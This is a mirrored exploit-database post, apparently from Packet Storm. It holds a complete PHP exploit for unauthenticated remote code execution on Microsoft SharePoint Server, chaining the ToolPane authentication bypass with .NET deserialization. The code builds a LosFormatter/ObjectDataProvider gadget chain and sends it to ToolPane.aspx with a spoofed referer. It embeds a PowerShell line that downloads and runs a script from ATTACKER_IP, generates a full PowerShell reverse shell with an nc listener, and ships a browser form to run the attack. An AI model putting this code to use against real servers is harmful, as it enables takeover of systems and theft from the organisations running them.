{"id":28311,"date":"2025-12-02T15:33:26","date_gmt":"2025-12-02T15:33:26","guid":{"rendered":"http:\/\/localhost\/?p=28311"},"modified":"2025-12-02T15:33:26","modified_gmt":"2025-12-02T15:33:26","slug":"microsoft-sharepoint-server-toolpane-authentication-bypass-unsafe-deserialization","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28311","title":{"rendered":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:59&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212316&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-49704&#8243;,&#8221;CVE-2025-49706&#8243;,&#8221;CVE-2025-53770&#8243;,&#8221;CVE-2025-53771&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Microsoft SharePoint Server ToolPane Authentication Bypass + Unsafe Deserialization                                         |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.microsoft.com\/en-us\/microsoft-365\/sharepoint\/                                                                   |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/207935\/ \\u0026 \\tCVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771\\n    \\n    [+] Summary : \\n              \\n               critical unauthenticated remote code execution vulnerabilities in Microsoft SharePoint Server. The vulnerability chain combines authentication bypass vulnerabilities \\n    \\t\\t   (CVE-2025-49706 and CVE-2025-53771) with an unsafe deserialization vulnerability (CVE-2025-49704) to achieve complete system compromise without authentication.\\n    \\t\\t  \\n    [+] Affected Components\\n    \\n    # Authentication Bypass Endpoint\\n    \\n    POST \/_layouts\/15\/ToolPane.aspx\/RANDOM_PATH\\n    \\n    # Deserialization Trigger\\n    \\n    ExcelDataSet Control with CompressedDataTable\\n    \\n    Vulnerability Chain\\n    \\n    1. Authentication Bypass via CVE-2025-49706 \\u0026 CVE-2025-53771\\n    2. Access ToolPane.aspx with arbitrary parameters\\n    3. Trigger unsafe deserialization via CVE-2025-49704\\n    4. Execute .NET gadget chain for code execution\\n    5. Achieve RCE as SharePoint application pool identity\\n    \\n    [+]  POC : php poc.php\\n    \\n    # Vulnerability Scan\\n    \\n    php poc.php -t http:\/\/sharepoint.company.com`\\n    \\n    # Execute Command\\n    \\n    php poc.php -t http:\/\/sharepoint.company.com -c &#8216;whoami&#8217;`\\n    \\n    # Create PowerShell Payload\\n    \\n    php poc.php &#8211;generate -l 192.168.1.100 -r 4444`\\n    \\n    Via Browser:\\n    \\n    https:\/\/yourserver.com\/exploit.php\\n    \\n    \\u003c?php\\n    \/**\\n     * Author: indoushka\\n     * Vulnerabilities: Authentication Bypass + Unsafe Deserialization\\n     *\/\\n    \\n    class SharePointExploit {\\n        private $target;\\n        private $base_path;\\n        \\n        public function __construct($target_url, $base_path = &#8216;\/&#8217;) {\\n            $this-\\u003etarget = rtrim($target_url, &#8216;\/&#8217;);\\n            $this-\\u003ebase_path = rtrim($base_path, &#8216;\/&#8217;);\\n        }\\n        \\n        public function check_vulnerability() {\\n            echo \\&#8221;[*] Checking SharePoint version and vulnerability&#8230;\\\\n\\&#8221;;\\n            \\n            $url = $this-\\u003etarget . $this-\\u003ebase_path . &#8216;\/_layouts\/15\/start.aspx&#8217;;\\n            \\n            $context = stream_context_create([\\n                &#8216;http&#8217; =\\u003e [\\n                    &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n                    &#8216;timeout&#8217; =\\u003e 10,\\n                    &#8216;user_agent&#8217; =\\u003e &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;\\n                ]\\n            ]);\\n            \\n            $response = @file_get_contents($url, false, $context);\\n            \\n            if ($response === false) {\\n                echo \\&#8221;[-] Could not connect to SharePoint\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            \/\/ Extract siteClientTag from JavaScript\\n            preg_match(&#8216;\/\\&#8221;*siteClientTag\\&#8221;*\\\\s*:\\\\s*\\&#8221;\\\\d*[$]+([^\\&#8221;]+)\\&#8221;,\/&#8217;, $response, $matches);\\n            \\n            if (!isset($matches[1])) {\\n                echo \\&#8221;[-] Could not determine SharePoint version\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            $version = $matches[1];\\n            echo \\&#8221;[+] SharePoint version detected: {$version}\\\\n\\&#8221;;\\n            \\n            \/\/ Check if version is vulnerable\\n            $vulnerable_versions = [\\n                &#8216;16.0.14326.20450&#8217; =\\u003e &#8216;16.0.18526.20424&#8217;, \/\/ SharePoint Subscription Edition\\n                &#8216;16.0.10337.12109&#8217; =\\u003e &#8216;16.0.10417.20027&#8217;, \/\/ SharePoint 2019\\n                &#8216;16.0.4351.1000&#8217;   =\\u003e &#8216;16.0.5508.1000&#8217;,   \/\/ SharePoint 2016\\n            ];\\n            \\n            foreach ($vulnerable_versions as $min_version =\\u003e $max_version) {\\n                if (version_compare($version, $min_version, &#8216;\\u003e=&#8217;) \\u0026\\u0026 \\n                    version_compare($version, $max_version, &#8216;\\u003c=&#8217;)) {\\n                    echo \\&#8221;[+] Version appears to be VULNERABLE!\\\\n\\&#8221;;\\n                    return true;\\n                }\\n            }\\n            \\n            echo \\&#8221;[-] Version appears to be PATCHED\\\\n\\&#8221;;\\n            return false;\\n        }\\n        \\n        public function exploit($command = &#8216;whoami&#8217;) {\\n            echo \\&#8221;[*] Exploiting SharePoint ToolPane vulnerabilities&#8230;\\\\n\\&#8221;;\\n            \\n            \/\/ Step 1: Create the gadget chain\\n            $gadget_chain = $this-\\u003ecreate_gadget_chain($command);\\n            if (!$gadget_chain) {\\n                echo \\&#8221;[-] Failed to create gadget chain\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            \/\/ Step 2: Send the exploit\\n            $result = $this-\\u003esend_exploit($gadget_chain);\\n            \\n            if ($result) {\\n                echo \\&#8221;[+] Exploit sent successfully\\\\n\\&#8221;;\\n                \/\/ Note: Command output may not be directly visible\\n                echo \\&#8221;[+] Check your listener for reverse shell\\\\n\\&#8221;;\\n            } else {\\n                echo \\&#8221;[-] Exploit failed\\\\n\\&#8221;;\\n            }\\n            \\n            return $result;\\n        }\\n        \\n        private function create_gadget_chain($command) {\\n            echo \\&#8221;[*] Creating .NET deserialization gadget chain&#8230;\\\\n\\&#8221;;\\n            \\n            \/\/ For demonstration, we&#8217;ll create a simple command execution payload\\n            \/\/ In a real scenario, this would be a complex .NET deserialization chain\\n            \\n            $payload = base64_encode($this-\\u003egenerate_payload($command));\\n            \\n            \/\/ Create the DataSet wrapper with the payload\\n            $name_a = $this-\\u003erandom_string(8);\\n            $name_b = $this-\\u003erandom_string(8);\\n            $name_c = $this-\\u003erandom_string(8);\\n            \\n            $schema = \\u003c\\u003c\\u003cXML\\n    \\u003cxs:schema xmlns=\\&#8221;\\&#8221; xmlns:xs=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema\\&#8221; xmlns:msdata=\\&#8221;urn:schemas-microsoft-com:xml-msdata\\&#8221; id=\\&#8221;{$name_a}\\&#8221;\\u003e\\n        \\u003cxs:element name=\\&#8221;{$name_a}\\&#8221; msdata:IsDataSet=\\&#8221;true\\&#8221; msdata:UseCurrentLocale=\\&#8221;true\\&#8221;\\u003e\\n            \\u003cxs:complexType\\u003e\\n                \\u003cxs:choice minOccurs=\\&#8221;0\\&#8221; maxOccurs=\\&#8221;unbounded\\&#8221;\\u003e\\n                    \\u003cxs:element name=\\&#8221;{$name_b}\\&#8221;\\u003e\\n                        \\u003cxs:complexType\\u003e\\n                            \\u003cxs:sequence\\u003e\\n                                \\u003cxs:element name=\\&#8221;{$name_c}\\&#8221; msdata:DataType=\\&#8221;System.Collections.Generic.List`1[[System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\\&#8221; type=\\&#8221;xs:anyType\\&#8221; minOccurs=\\&#8221;0\\&#8221;\/\\u003e\\n                            \\u003c\/xs:sequence\\u003e\\n                        \\u003c\/xs:complexType\\u003e\\n                    \\u003c\/xs:element\\u003e\\n                \\u003c\/xs:choice\\u003e\\n            \\u003c\/xs:complexType\\u003e\\n        \\u003c\/xs:element\\u003e\\n    \\u003c\/xs:schema\\u003e\\n    XML;\\n    \\n            $diffgram = \\u003c\\u003c\\u003cXML\\n    \\u003cdiffgr:diffgram xmlns:msdata=\\&#8221;urn:schemas-microsoft-com:xml-msdata\\&#8221; xmlns:diffgr=\\&#8221;urn:schemas-microsoft-com:xml-diffgram-v1\\&#8221;\\u003e\\n        \\u003c{$name_a}\\u003e\\n            \\u003c{$name_b} diffgr:id=\\&#8221;Table\\&#8221; msdata:rowOrder=\\&#8221;0\\&#8221; diffgr:hasChanges=\\&#8221;inserted\\&#8221;\\u003e\\n                \\u003c{$name_c} xmlns:xsi=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema-instance\\&#8221; xmlns:xsd=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema\\&#8221;\\u003e\\n                    \\u003cExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema-instance\\&#8221; xmlns:xsd=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema\\&#8221;\\u003e\\n                        \\u003cExpandedElement\/\\u003e\\n                        \\u003cProjectedProperty0\\u003e\\n                            \\u003cMethodName\\u003eDeserialize\\u003c\/MethodName\\u003e\\n                            \\u003cMethodParameters\\u003e\\n                                \\u003canyType xmlns:xsi=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema-instance\\&#8221; xmlns:xsd=\\&#8221;http:\/\/www.w3.org\/2001\/XMLSchema\\&#8221; xsi:type=\\&#8221;xsd:string\\&#8221;\\u003e{$payload}\\u003c\/anyType\\u003e\\n                            \\u003c\/MethodParameters\\u003e\\n                            \\u003cObjectInstance xsi:type=\\&#8221;LosFormatter\\&#8221;\\u003e\\u003c\/ObjectInstance\\u003e\\n                        \\u003c\/ProjectedProperty0\\u003e\\n                    \\u003c\/ExpandedWrapperOfLosFormatterObjectDataProvider\\u003e\\n                \\u003c\/{$name_c}\\u003e\\n            \\u003c\/{$name_b}\\u003e\\n        \\u003c\/{$name_a}\\u003e\\n    \\u003c\/diffgr:diffgram\\u003e\\n    XML;\\n    \\n            \/\/ Combine into the final gadget chain\\n            $gadget_chain = $schema . $diffgram;\\n            \\n            return $gadget_chain;\\n        }\\n        \\n        private function generate_payload($command) {\\n            \/\/ Generate a simple PowerShell payload\\n            \/\/ In a real exploit, this would be a proper .NET deserialization payload\\n            \\n            $powershell_cmd = base64_encode(\\&#8221;iex (New-Object Net.WebClient).DownloadString(&#8216;http:\/\/ATTACKER_IP\/payload.ps1&#8217;)\\&#8221;);\\n            \\n            $payload = \\u003c\\u003c\\u003cPS\\n    powershell -enc {$powershell_cmd}\\n    PS;\\n            \\n            return $payload;\\n        }\\n        \\n        private function send_exploit($gadget_chain) {\\n            echo \\&#8221;[*] Sending exploit to ToolPane.aspx&#8230;\\\\n\\&#8221;;\\n            \\n            $random_path = $this-\\u003erandom_string(8);\\n            $random_param = $this-\\u003erandom_string(8);\\n            \\n            $namespace_ui = $this-\\u003erandom_string(8);\\n            $namespace_scorecards = $this-\\u003erandom_string(8);\\n            \\n            \/\/ Compress the gadget chain\\n            $compressed_gadget = gzencode($gadget_chain);\\n            $encoded_gadget = base64_encode($compressed_gadget);\\n            \\n            \/\/ Create the XML payload\\n            $xml = \\u003c\\u003c\\u003cXML\\n    \\u003c%@ Register Tagprefix=\\&#8221;{$namespace_ui}\\&#8221; Namespace=\\&#8221;System.Web.UI\\&#8221; Assembly=\\&#8221;System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\\&#8221; %\\u003e\\n    \\u003c%@ Register Tagprefix=\\&#8221;{$namespace_scorecards}\\&#8221; Namespace=\\&#8221;Microsoft.PerformancePoint.Scorecards\\&#8221; Assembly=\\&#8221;Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\\&#8221; %\\u003e\\n        \\u003c{$namespace_ui}:UpdateProgress\\u003e\\n          \\u003cProgressTemplate\\u003e\\n            \\u003c{$namespace_scorecards}:ExcelDataSet CompressedDataTable=\\&#8221;{$encoded_gadget}\\&#8221; DataTable-CaseSensitive=\\&#8221;true\\&#8221; runat=\\&#8221;server\\&#8221;\/\\u003e\\n          \\u003c\/ProgressTemplate\\u003e\\n        \\u003c\/{$namespace_ui}:UpdateProgress\\u003e\\n    XML;\\n    \\n            $url = $this-\\u003etarget . $this-\\u003ebase_path . \\&#8221;\/_layouts\/15\/ToolPane.aspx\/{$random_path}\\&#8221;;\\n            \\n            $post_data = http_build_query([\\n                &#8216;MSOTlPn_Uri&#8217; =\\u003e $this-\\u003etarget . $this-\\u003ebase_path . &#8216;\/_controltemplates\/15\/AclEditor.ascx&#8217;,\\n                &#8216;MSOTlPn_DWP&#8217; =\\u003e $xml\\n            ]);\\n            \\n            $get_params = http_build_query([\\n                &#8216;DisplayMode&#8217; =\\u003e &#8216;Edit&#8217;,\\n                $random_param =\\u003e &#8216;\/ToolPane.aspx&#8217;\\n            ]);\\n            \\n            $full_url = $url . &#8216;?&#8217; . $get_params;\\n            \\n            $headers = [\\n                &#8216;Referer: &#8216; . $this-\\u003etarget . $this-\\u003ebase_path . &#8216;\/_layouts\/SignOut.aspx&#8217;,\\n                &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;,\\n                &#8216;User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;\\n            ];\\n            \\n            $context = stream_context_create([\\n                &#8216;http&#8217; =\\u003e [\\n                    &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n                    &#8216;header&#8217; =\\u003e implode(\\&#8221;\\\\r\\\\n\\&#8221;, $headers),\\n                    &#8216;content&#8217; =\\u003e $post_data,\\n                    &#8216;timeout&#8217; =\\u003e 15,\\n                    &#8216;ignore_errors&#8217; =\\u003e true\\n                ]\\n            ]);\\n            \\n            $response = @file_get_contents($full_url, false, $context);\\n            \\n            if ($response === false) {\\n                return false;\\n            }\\n            \\n            \/\/ Check for successful exploitation indicators\\n            if (strpos($response, &#8216;error&#8217;) === false) {\\n                return true;\\n            }\\n            \\n            return false;\\n        }\\n        \\n        private function random_string($length = 8) {\\n            $characters = &#8216;abcdefghijklmnopqrstuvwxyz&#8217;;\\n            $result = &#8221;;\\n            for ($i = 0; $i \\u003c $length; $i++) {\\n                $result .= $characters[rand(0, strlen($characters) &#8211; 1)];\\n            }\\n            return $result;\\n        }\\n        \\n        public function generate_powershell_payload($lhost, $lport) {\\n            $payload = \\u003c\\u003c\\u003cPS\\n    \\\\$client = New-Object System.Net.Sockets.TCPClient(&#8216;{$lhost}&#8217;,{$lport});\\n    \\\\$stream = \\\\$client.GetStream();\\n    [byte[]]\\\\$bytes = 0..65535|%{0};\\n    while((\\\\$i = \\\\$stream.Read(\\\\$bytes, 0, \\\\$bytes.Length)) -ne 0){\\n        \\\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\\$bytes,0, \\\\$i);\\n        \\\\$sendback = (iex \\\\$data 2\\u003e\\u00261 | Out-String );\\n        \\\\$sendback2 = \\\\$sendback + &#8216;PS &#8216; + (pwd).Path + &#8216;\\u003e &#8216;;\\n        \\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\\$sendback2);\\n        \\\\$stream.Write(\\\\$sendbyte,0,\\\\$sendbyte.Length);\\n        \\\\$stream.Flush();\\n    }\\n    \\\\$client.Close();\\n    PS;\\n            \\n            $encoded = base64_encode($payload);\\n            file_put_contents(&#8216;payload.ps1&#8217;, $payload);\\n            \\n            echo \\&#8221;[+] PowerShell payload created: payload.ps1\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Use command: powershell -enc {$encoded}\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Start listener: nc -lvnp {$lport}\\\\n\\&#8221;;\\n            \\n            return $encoded;\\n        }\\n    }\\n    \\n    \/\/ Command line interface\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        echo \\&#8221;\\n    \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n    \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n    \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n    \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n    \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\\n    \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\\n        \\n        SharePoint ToolPane Unauthenticated RCE Exploit\\n        CVE-2025-49706, CVE-2025-53771, CVE-2025-49704\\n            \\\\n\\&#8221;;\\n        \\n        $options = getopt(\\&#8221;t:p:c:l:r:gh\\&#8221;, [\\n            \\&#8221;target:\\&#8221;,\\n            \\&#8221;path:\\&#8221;,\\n            \\&#8221;command:\\&#8221;,\\n            \\&#8221;lhost:\\&#8221;,\\n            \\&#8221;lport:\\&#8221;,\\n            \\&#8221;generate\\&#8221;,\\n            \\&#8221;help\\&#8221;\\n        ]);\\n        \\n        if (isset($options[&#8216;h&#8217;]) || isset($options[&#8216;help&#8217;]) || $argc == 1) {\\n            echo \\&#8221;Usage: php poc.php [options]\\\\n\\&#8221;;\\n            echo \\&#8221;Options:\\\\n\\&#8221;;\\n            echo \\&#8221;  -t, &#8211;target        Target URL (required)\\\\n\\&#8221;;\\n            echo \\&#8221;  -p, &#8211;path          Base path (default: \/)\\\\n\\&#8221;;\\n            echo \\&#8221;  -c, &#8211;command       Command to execute\\\\n\\&#8221;;\\n            echo \\&#8221;  -l, &#8211;lhost         Listener IP for reverse shell\\\\n\\&#8221;;\\n            echo \\&#8221;  -r, &#8211;lport         Listener port for reverse shell\\\\n\\&#8221;;\\n            echo \\&#8221;  -g, &#8211;generate      Generate PowerShell payload only\\\\n\\&#8221;;\\n            echo \\&#8221;  -h, &#8211;help          Show this help message\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExamples:\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php -t http:\/\/sharepoint.company.com -c &#8216;whoami&#8217;\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php -t http:\/\/sharepoint.company.com -l 192.168.1.100 -r 4444\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php &#8211;generate -l 192.168.1.100 -r 4444\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        if (isset($options[&#8216;g&#8217;]) || isset($options[&#8216;generate&#8217;])) {\\n            if (!isset($options[&#8216;l&#8217;]) \\u0026\\u0026 !isset($options[&#8216;lhost&#8217;])) {\\n                echo \\&#8221;Error: LHOST is required for payload generation\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n            \\n            $lhost = isset($options[&#8216;l&#8217;]) ? $options[&#8216;l&#8217;] : $options[&#8216;lhost&#8217;];\\n            $lport = isset($options[&#8216;r&#8217;]) ? $options[&#8216;r&#8217;] : (isset($options[&#8216;lport&#8217;]) ? $options[&#8216;lport&#8217;] : 4444);\\n            \\n            $exploit = new SharePointExploit(&#8221;);\\n            $exploit-\\u003egenerate_powershell_payload($lhost, $lport);\\n            exit(0);\\n        }\\n        \\n        if (!isset($options[&#8216;t&#8217;]) \\u0026\\u0026 !isset($options[&#8216;target&#8217;])) {\\n            echo \\&#8221;Error: Target URL is required\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $target = isset($options[&#8216;t&#8217;]) ? $options[&#8216;t&#8217;] : $options[&#8216;target&#8217;];\\n        $path = isset($options[&#8216;p&#8217;]) ? $options[&#8216;p&#8217;] : (isset($options[&#8216;path&#8217;]) ? $options[&#8216;path&#8217;] : &#8216;\/&#8217;);\\n        $command = isset($options[&#8216;c&#8217;]) ? $options[&#8216;c&#8217;] : (isset($options[&#8216;command&#8217;]) ? $options[&#8216;command&#8217;] : &#8216;whoami&#8217;);\\n        \\n        $exploit = new SharePointExploit($target, $path);\\n        \\n        \/\/ Check vulnerability first\\n        if (!$exploit-\\u003echeck_vulnerability()) {\\n            echo \\&#8221;[-] Target does not appear to be vulnerable\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        \/\/ Execute exploit\\n        $exploit-\\u003eexploit($command);\\n        \\n    } else {\\n        \/\/ Web interface\\n        if (isset($_POST[&#8216;exploit&#8217;])) {\\n            $target = $_POST[&#8216;target&#8217;] ?? &#8221;;\\n            $path = $_POST[&#8216;path&#8217;] ?? &#8216;\/&#8217;;\\n            $command = $_POST[&#8216;command&#8217;] ?? &#8216;whoami&#8217;;\\n            \\n            if ($target) {\\n                $exploit = new SharePointExploit($target, $path);\\n                \\n                ob_start();\\n                $exploit-\\u003echeck_vulnerability();\\n                $exploit-\\u003eexploit($command);\\n                $output = ob_get_clean();\\n                \\n                echo \\&#8221;\\u003cpre\\u003e$output\\u003c\/pre\\u003e\\&#8221;;\\n            } else {\\n                echo \\&#8221;\\u003cdiv style=&#8217;color: red;&#8217;\\u003eTarget URL is required\\u003c\/div\\u003e\\&#8221;;\\n            }\\n        } else {\\n            echo &#8216;\\u003c!DOCTYPE html\\u003e\\n            \\u003chtml\\u003e\\n            \\u003chead\\u003e\\n                \\u003ctitle\\u003eSharePoint RCE Exploit\\u003c\/title\\u003e\\n                \\u003cstyle\\u003e\\n                    body { font-family: Arial, sans-serif; margin: 40px; }\\n                    .container { max-width: 600px; margin: 0 auto; }\\n                    .form-group { margin-bottom: 15px; }\\n                    label { display: block; margin-bottom: 5px; font-weight: bold; }\\n                    input[type=\\&#8221;text\\&#8221;] { \\n                        width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px; \\n                    }\\n                    button { \\n                        background: #007cba; color: white; padding: 10px 20px; \\n                        border: none; border-radius: 4px; cursor: pointer; \\n                    }\\n                \\u003c\/style\\u003e\\n            \\u003c\/head\\u003e\\n            \\u003cbody\\u003e\\n                \\u003cdiv class=\\&#8221;container\\&#8221;\\u003e\\n                    \\u003ch1\\u003eSharePoint ToolPane RCE Exploit\\u003c\/h1\\u003e\\n                    \\u003cform method=\\&#8221;post\\&#8221;\\u003e\\n                        \\u003cinput type=\\&#8221;hidden\\&#8221; name=\\&#8221;exploit\\&#8221; value=\\&#8221;1\\&#8221;\\u003e\\n                        \\n                        \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                            \\u003clabel for=\\&#8221;target\\&#8221;\\u003eTarget URL:\\u003c\/label\\u003e\\n                            \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;target\\&#8221; name=\\&#8221;target\\&#8221; placeholder=\\&#8221;http:\/\/sharepoint.company.com\\&#8221; required\\u003e\\n                        \\u003c\/div\\u003e\\n                        \\n                        \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                            \\u003clabel for=\\&#8221;path\\&#8221;\\u003eBase Path:\\u003c\/label\\u003e\\n                            \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;path\\&#8221; name=\\&#8221;path\\&#8221; value=\\&#8221;\/\\&#8221;\\u003e\\n                        \\u003c\/div\\u003e\\n                        \\n                        \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                            \\u003clabel for=\\&#8221;command\\&#8221;\\u003eCommand:\\u003c\/label\\u003e\\n                            \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;command\\&#8221; name=\\&#8221;command\\&#8221; value=\\&#8221;whoami\\&#8221;\\u003e\\n                        \\u003c\/div\\u003e\\n                        \\n                        \\u003cbutton type=\\&#8221;submit\\&#8221;\\u003eExecute Exploit\\u003c\/button\\u003e\\n                    \\u003c\/form\\u003e\\n                \\u003c\/div\\u003e\\n            \\u003c\/body\\u003e\\n            \\u003c\/html\\u003e&#8217;;\\n        }\\n    }\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212316&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#82